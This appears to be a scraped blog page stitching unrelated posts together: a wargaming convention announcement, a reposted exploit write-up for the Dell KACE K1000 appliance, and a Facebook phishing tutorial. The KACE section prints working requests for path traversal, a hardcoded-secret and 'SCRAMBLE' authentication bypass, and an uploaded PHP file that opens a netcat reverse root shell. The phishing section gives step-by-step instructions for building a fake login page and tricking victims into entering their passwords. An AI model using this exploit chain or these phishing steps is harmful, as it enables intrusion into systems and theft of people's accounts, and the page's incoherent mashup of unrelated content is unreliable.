Ni Chicha Ni Limonada

Ni chicha Ni limonada

Little Wars is the annual wargaming convention produced by the Historical Miniatures Gaming Society of the Midwest (HMGS-Midwest). It's a great time and very inexpensive too. $40.00USD for three days of great miniatures games of all types - can't beat that!

I'm the guy who usually runs fantasy games in the middle of a lot of historical gaming (Heh) and this year is no different. I'm running a game a day, starting at 11am each day. Here's what's on tap.

Rescue of Hommlet - Friday, 11am - Grand Ballroom Space 7

If you've been reading my blog for the past few weeks, you've seen the preparation I'm making for my GaryCon debut of this Greyhawk-related scenario. Set at the beginning of the venerable module T1 - Village of Hommlet, it sets up an RPG/wargame hybrid scenario. The picture to the left there is the model I've made of the Moathouse. I'm doing this same game at Little Wars

The blurb reads: A discrete summons has reached your ears, for the good people of Hommlet are in fear for their lives! A militia of foul brigands from Nulb have been spotted near the old Moathouse of ill reputation! What evil lurks there and beyond? Find out, brave heroes, using Chainmail (and a bit of Original D&D)

Chaos War in the Dungeon! - Saturday, 11am - Grand Ballroom Space 9

For the fourth year in a row, I'm running Chaos Wars at Little Wars! This year, I'm bringing some fun terrain and an interesting scenario - fighting a desperate battle underground! This isn't your usual dungeon crawl, this a dungeon BRAWL!

The blurb reads: Go underground in dark tunnels and chambers filled with horrors or treasures! Brave Lawful allies fight against foul Bestials! Who will emerge victorious? Fight in a unique terrain setup using Chaos Wars fantasy miniature wargaming rules and all genuine Ral Partha armies!

HOTT Times in Etinerra - Sunday, 11am - Grand Ballroom Space 19

I've paid attention to the games being played at Little Wars and surprisingly, DBA and HOTT are not usually on the event list. This year, I believe that I'm the ONLY DBA/HOTT game there. Which will be great! I'll be bringing my 15mm Human and Orc/Goblin armies and letting players bash each other to pieces!

Here's the blurb: As the Orc and Goblin forces assembled on the horizon, the Human commander gazed nervously from the roof of her castle Stronghold. Would the forces of Weal prevail against the army of Woe? Find out with a fun game of Hordes of the Things set in the Etinerra campaign world. Wizards! Monsters! Oh my!

There's plenty of other great gaming to be had - some SciFi, a lot of historicals. This convention is usually how I scratch my historical itches, so that I don't go and buy a bunch of games and armies and end up never having time for anything else! This year, I'm playing in an American War of Independence game, An Axis & Allies Global game, and a Third Crusades game. And the dealer hall usually vacuums a load of cash from my wallet and credit cards as well.

Can't wait! I hope I'll see you there, come say Hi!

Ni chicha Ni limonada

A bit over a month ago I had the chance to play with a Dell KACE K1000 appliance ("http://www.kace.com/products/systems-management-appliance"). I'm not even sure how to feel about what I saw, mostly I was just disgusted. All of the following was confirmed on the latest version of the K1000 appliance (5.5.90545), if they weren't working on a patch for this - they are now.

Anyways, the first bug I ran into was an authenticated script that was vulnerable to path traversal:

POST /userui/downloadpxy.php HTTP/1.1
User-Agent: Mozilla/5.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Cookie: kboxid=xxxxxxxxxxxxxxxxxxxxxxxx
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 114
DOWNLOAD_SOFTWARE_ID=1227&DOWNLOAD_FILE=../../../../../../../../../../usr/local/etc/php.ini&ID=7&Download=Download

HTTP/1.1 200 OK
Date: Tue, 04 Feb 2014 21:38:39 GMT
Server: Apache
Expires: 0
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: public
Content-Length: 47071
Content-Disposition: attachment; filename*=UTF-8''..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fusr%2Flocal%2Fetc%2Fphp.ini
X-DellKACE-Appliance: k1000
X-DellKACE-Version: 5.5.90545
X-KBOX-Version: 5.5.90545
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: application/ini
[PHP]
;;;;;;;;;;;;;;;;;;;
; About php.ini ;
;;;;;;;;;;;;;;;;;;;

That bug is neat, but its post-auth and can't be used for RCE because it returns the file as an attachment :(

So moving along, I utilized the previous bug to navigate the file system (its nice enough to give a directory listing if a path is provided, thanks!), this led me to a file named "kbot_upload.php". This file is located on the appliance at the following location:

http://targethost/service/kbot_upload.php

This script includes "KBotUpload.class.php" and then calls "KBotUpload::HandlePUT()", it does not check for a valid session and utilizes its own "special" means to auth the request.

The "HandlePut()" function contains the following calls:

$checksumFn = $_GET['filename'];
$fn = rawurldecode($_GET['filename']);
$machineId = $_GET['machineId'];
$checksum = $_GET['checksum'];
$mac = $_GET['mac'];
$kbotId = $_GET['kbotId'];
$version = $_GET['version'];
$patchScheduleId = $_GET['patchscheduleid'];
if ($checksum != self::calcTokenChecksum($machineId, $checksumFn, $mac) && $checksum != "SCRAMBLE") {
KBLog($_SERVER["REMOTE_ADDR"] . " token checksum did not match, "
."($machineId, $checksumFn, $mac)");
KBLog($_SERVER['REMOTE_ADDR'] . " returning 500 "
."from HandlePUT(".construct_url($_GET).")");
header("Status: 500", true, 500);
return;
}

The server checks to ensure that the request is authorized by inspecting the "checksum" variable that is part of the server request. This "checksum" variable is created by the client using the following:

md5("$filename $machineId $mac" . 'ninjamonkeypiratelaser#[@g3rnboawi9e9ff');

Server side check:

private static function calcTokenChecksum($filename, $machineId, $mac)
{
//return md5("$filename $machineId $mac" . $ip .
// 'ninjamonkeypiratelaser#[@g3rnboawi9e9ff');

// our tracking of ips really sucks and when I'm vpn'ed from
// home I couldn't get patching to work, cause the ip that
// was on the machine record was different from the
// remote server ip.
return md5("$filename $machineId $mac" .
'ninjamonkeypiratelaser#[@g3rnboawi9e9ff');
}

The "secret" value is hardcoded into the application and cannot be changed by the end user (backdoor++;). Once an attacker knows this value, they are able to bypass the authorization check and upload a file to the server.

In addition to this "calcTokenChecksum" check, there is a hardcoded value of "SCRAMBLE" that can be provided by the attacker that will bypass the auth check (backdoor++;):

if ($checksum != self::calcTokenChecksum($machineId, $checksumFn, $mac) && $checksum != "SCRAMBLE") {

Once this check is bypassed we are able to write a file anywhere on the server where we have permissions (thanks directory traversal #2!), at this time we are running in the context of the "www" user (boooooo). The "www" user has permission to write to the directory "/kbox/kboxwww/tmp", time to escalate to something more useful :)

From our new home in "tmp" with our weak user it was discovered that the KACE K1000 application contains admin functionality (not exposed to the webroot) that is able to execute commands as root using some IPC ("KSudoClient.class.php").

The "KSudoClient.class.php" can be used to execute commands as root, specifically the function "RunCommandWait". The following application call utilizes everything that was outlined above and sets up a reverse root shell, "REMOTEHOST" would be replaced with the host we want the server to connect back to:

POST /service/kbot_upload.php?filename=db.php&machineId=../../../kboxwww/tmp/&checksum=SCRAMBLE&mac=xxx&kbotId=blah&version=blah&patchsecheduleid=blah HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
Content-Length: 190
<?php
require_once 'KSudoClient.class.php';
KSudoClient::RunCommandWait("rm /kbox/kboxwww/tmp/db.php;rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc REMOTEHOST 4444 >/tmp/f");?>

Once this was sent, we can setup our listener on our server and call the file we uploaded and receive our root shell:

http://targethost/service/tmp/db.php

On our host:

~$ ncat -lkvp 4444
Ncat: Version 5.21 ( http://nmap.org/ncat )
Ncat: Listening on 0.0.0.0:4444
Ncat: Connection from XX.XX.XX.XX
sh: can't access tty; job control turned off
# id
uid=0(root) gid=0(wheel) groups=0(wheel)

So at the end of the the day the count looks like this:

Directory Traversals: 2
Backdoors: 2
Privilege Escalation: 1

That all adds up to owned last time I checked.

Example PoC can be found at the following location:
https://github.com/steponequit/kaced/blob/master/kaced.py

Example usage can be seen below:

SO, HOW TO HACK A FACEBOOK ACCOUNT?

There are few techniques by which you can hack a facebook account but here the easiest way we'll discuss.

REQUIREMENTS

Phisher Creator ( Fake page generator)
Hosting ( To host a fake page). Either you can purchase one or also can use free hosting like 110mb.com. But in free hosting, the account will be suspended after a few logins.

STEPS TO FOLLOW

Download phisher creator and run it.
As you run it, you'll see a screen like the shown below. Here you can type the fields as I have done.
Once you hit the Create Phisher button, it'll create a fake facebook index page and fb_login.php file in the output folder.
Now you need to upload these both files index.html and fb_login.php to the hosting account.
After uploading the file, open the index.html file path. It will open up a page like same facebook page as you can see below.
We're all done, now we just need to copy the URL of our fake page and distribute it to the victims, you just have to trick them with your social engineering that how you convenience them to open this URL to login facebook. Once someone tries to login through your fake facebook page URL, you'll get their account username and password in the log_file.txt in the same directory of hosting where you have uploaded index.php and fb_login.php.

Hope it'll work fine for you and you have learned how to hack a facebook account. If you find any question or query related to this, feel free to comment below or you can also follow another way that might work well for you to hack facebook account.

Read more

Ni Chicha Ni Limonada

Contador nichichanilimonada

viernes, 4 de septiembre de 2020

Gaming At Little Wars In April!

lunes, 31 de agosto de 2020

The Curious Case Of The Ninjamonkeypiratelaser Backdoor

More articles

domingo, 30 de agosto de 2020

BurpSuite Introduction & Installation

More articles

HOW TO BECOME A CERTIFIED ETHICAL HACKER

HOW TO HACK A FACEBOOK ACCOUNT? STEP BY STEP

SO, HOW TO HACK A FACEBOOK ACCOUNT?

REQUIREMENTS

STEPS TO FOLLOW

Post anteriores